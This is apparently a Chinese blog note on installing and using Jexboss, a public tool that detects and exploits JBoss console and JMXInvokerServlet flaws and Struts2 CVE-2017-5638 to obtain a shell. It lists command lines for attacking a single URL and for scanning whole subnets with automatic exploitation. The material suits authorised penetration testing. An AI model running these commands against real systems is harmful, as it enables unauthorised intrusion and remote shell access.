随记(七):Jboss漏洞检测利用工具

Jboss漏洞检测利用工具

Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。

工具下载:https://github.com/joaomatosf/jexboss

此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。

0x01 安装方法

## 克隆项目至本地
git clone https://github.com/joaomatosf/jexboss.git
## 切换至项目根目录
cd jexboss
## 安装项目所需要的依赖
pip2 install -r requires.txt
## 使用
python2 jexboss.py -h

随记(七):Jboss漏洞检测利用工具

0x02 使用方法

## 攻击目标网站
python2 jexboss.py -u http://192.168.0.26:8080

随记(七):Jboss漏洞检测利用工具
随记(七):Jboss漏洞检测利用工具

## 网络扫描模式
python2 jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

随记(七):Jboss漏洞检测利用工具

## 自动化漏洞利用的网络扫描模式
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

## 自动化漏洞利用的网络扫描模式(多端口)
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080,80,8888 -results results_auto_scan.txt

## 批量扫描
python2 jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log

## 针对 Apache Struts2(CVE-2017-5638漏洞)
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2

## 带Cookie的CVE-2017-5638漏洞利用
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2 --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
上一篇:SpingData 的学习


下一篇:python中pip的安装问题